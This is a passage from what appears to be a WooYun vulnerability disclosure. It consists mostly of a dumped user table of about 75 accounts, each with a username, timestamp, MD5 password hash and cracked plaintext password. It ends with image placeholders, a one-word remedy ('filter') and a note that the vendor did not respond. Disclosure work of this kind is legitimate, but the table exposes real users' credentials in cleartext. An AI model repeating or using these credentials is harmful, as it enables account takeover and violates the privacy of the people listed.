| lixun0315            | 1335538762 | c453bbc7aed6234f3676029e4acd160d                | 1986315         | 1986315         |
| xiaomei1975          | 1335540855 | 389cf2377bf81a61b9b4c8ccc2d6cfa8                | 21021055        | 21021055        |
| a9320341             | 1335541816 | 171e877b7b8f07c9bfa62c685ecb930a                | 9320341         | 9320341         |
| 7j1AzAZeTmR          | 1380864618 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| c556634              | 1335543602 | 0abd864f9be4e0e40d8986a0ac6efc26                | a5283015        | a5283015        |
| mc87199457           | 1335547799 | d355249d4c0aa3a2796fb4591f7d6419                | 5639318240      | 5639318240      |
| 5S2xXcXwsFOfuj       | 1384926387 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| w8YI5j               | 1383630848 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| fengxuere            | 1335553521 | 68e5bf32643ff0419baba17fbef79fd7                | 2654533         | 2654533         |
| yueshan              | 1335553705 | 68e5bf32643ff0419baba17fbef79fd7                | 2654533         | 2654533         |
| huanying             | 1335553931 | 68e5bf32643ff0419baba17fbef79fd7                | 2654533         | 2654533         |
| piaopiao             | 1335554177 | 68e5bf32643ff0419baba17fbef79fd7                | 2654533         | 2654533         |
| ce1hIgcU0RxvfVx1     | 1375366180 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| xxjiuxx1             | 1335555643 | ba5dd555408d963e8b2229f77a41647f                | zhangzizi1      | zhangzizi1      |
| xzQPLhu484W1Qj6iE4   | 1373289739 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| morale001            | 1335572177 | 11118b412b5c45f07664f10d29b365e0                | af86464316      | af86464316      |
| DMwPGBABBvQW3        | 1361891875 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| 443672697            | 1335572494 | 53843366e6d8edd0e1b024c848c56084                | 5412987         | 5412987         |
| 4TURLp               | 1380611797 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| cMn2LDk6Xr01KD       | 1370927689 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| gnQ3dsuyeRx8eDC      | 1368000797 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| cJ3Q9F               | 1378793521 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| ANxWC5BHdP           | 1386297576 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| willzheng            | 1335574277 | f976e6e3a632f5ea58fe7fd8bc8f0ddb                | 32344234        | 32344234        |
| 4p7UvhV4RzJSRHT0I    | 1371444968 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| CXiJ1uNamc9jKZYN     | 1365752376 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| feitianmh2           | 1335574992 | 9a0f900ee423c942733de84c15acdf93                | woaini001       | woaini001       |
| ctt000               | 1335575599 | 614b0a8d99ae592b13a00f7c7a54a3e8                | 6828000         | 6828000         |
| IMcv5op              | 1385692629 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| thesunbird           | 1335576051 | b18cf23c7463054cd938a65495491ef6                | 4flybird        | 4flybird        |
| I1SYMFnuEC1Ktc8      | 1381828356 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| oy0mcZLrXTB          | 1386339790 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| zzz31420641          | 1335576410 | e4b39e8edc33927344ace6c91300f319                | z31420641       | z31420641       |
| 2raHprmdZBq1         | 1377073697 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| rmbsqX               | 1370941334 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| game7445             | 1335576677 | 803f44c5cb1526abcdf9e0afa082f080                | aa3591331       | aa3591331       |
| xxsoto               | 1335576720 | 50551ac8a34598b51f3162bfd50a030e                | 9118200         | 9118200         |
| zf2wLLwGFBAPOz5EW    | 1365602073 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| ViEihsBL3tDd         | 1368003566 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| themoonbird          | 1335576847 | b18cf23c7463054cd938a65495491ef6                | 4flybird        | 4flybird        |
| xia3097              | 1335576869 | 803f44c5cb1526abcdf9e0afa082f080                | aa3591331       | aa3591331       |
| 8dgMl1wuX6cjuSRrAnKZ | 1369831102 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| BS6ArKRSGYWb         | 1380276647 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| CSDLSph05L2DvWR      | 1370330896 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| i3dA5dkIC            | 1376898215 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| 1185ou               | 1335577024 | 803f44c5cb1526abcdf9e0afa082f080                | aa3591331       | aa3591331       |
| deltamfg             | 1335577182 | 401c8307a305f546b0224d463744597f                | 6928452         | 6928452         |
| 1772xi               | 1335577207 | 803f44c5cb1526abcdf9e0afa082f080                | aa3591331       | aa3591331       |
| tong926              | 1335577211 | 10132a1847d88a1c2969d9df9e49a630 (120105)       | 120105          | 120105          |
| shanyaodou           | 1335577277 | b7f92578685065258f8ab90f823c3e5f                | xzzxyz92ly      | xzzxyz92ly      |
| libo860624           | 1335577284 | 95ea3329531b734488cbe525abdf1e09                | 860624          | 860624          |
| whcmeiziya           | 1335577315 | 5e5519f0dfd54640b047dbe14d73b65e                | 4711901         | 4711901         |
| Dr8uuB1nil0qnMuy4GOA | 1377496677 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| yingyuefu2010        | 1335577376 | e71589ee5ed12ad0a5980812b25d2a94                | ying330721      | ying330721      |
| yanyun123            | 1335577389 | 803f44c5cb1526abcdf9e0afa082f080                | aa3591331       | aa3591331       |
| ARdUFOnPVsqw2uxN     | 1387377069 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| 30jIflxg5            | 1372071373 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| yanzi321             | 1335577598 | 803f44c5cb1526abcdf9e0afa082f080                | aa3591331       | aa3591331       |
| 903175305            | 1335577636 | 72d056dac02d74fbf539298fdba91078                | heyiquan        | heyiquan        |
| WSpmSXyoCMrbnRTOa3   | 1380593871 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| kjw520ttxq           | 1335577699 | 2bebb4d38926dd0c3b43314324e1969d                | mlf2325081      | mlf2325081      |
| i0cwUtMTlTnyyW       | 1386298211 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| zhujiejack           | 1335577740 | f708c0491c0f684806185b534b3f99fa                | 11817817jack    | 11817817jack    |
| JPC2k3a4             | 1365573891 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| 7445037271           | 1335578000 | 803f44c5cb1526abcdf9e0afa082f080                | aa3591331       | aa3591331       |
| KMyUXSoLmyIU         | 1375766918 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| guan165              | 1335578061 | 632c96dc2ee2b05f8bd57b9c78cd2003                | 6235778         | 6235778         |
| sxmajie18            | 1335578081 | c8704c3bb45d9128a812481db23ec61c                | 19821023        | 19821023        |
| g6nuQA9AVjRzcSEIiEpO | 1377253125 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| y89EyqRlv40RpVh      | 1376046845 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| xpQJZ15bT7XhH1X4XEA  | 1388146250 | 96e79218965eb72c92a549dd5a330112 (111111)       | 111111          | 111111          |
| chongyujun           | 1335578254 | 8c03e424636fd2f7367bdfd18fe5003d                | 4127713         | 4127713         |
| a386331001           | 1335578412 | 460894a7dcb53c895047275648dacbbe                | LIjian          | LIjian          |
| yjw211134            | 1335578519 | 6439bee939530989f3d96dba33ddb090                | 211134          | 211134          |
+----------------------+------------+-------------------------------------------------+-----------------+-----------------+


6.png


7.png


8.png


9.png


10.png


11.png


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评价